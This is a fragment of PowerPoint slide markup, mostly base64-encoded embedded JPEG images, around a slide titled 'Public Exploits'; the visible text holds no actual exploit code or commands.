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2073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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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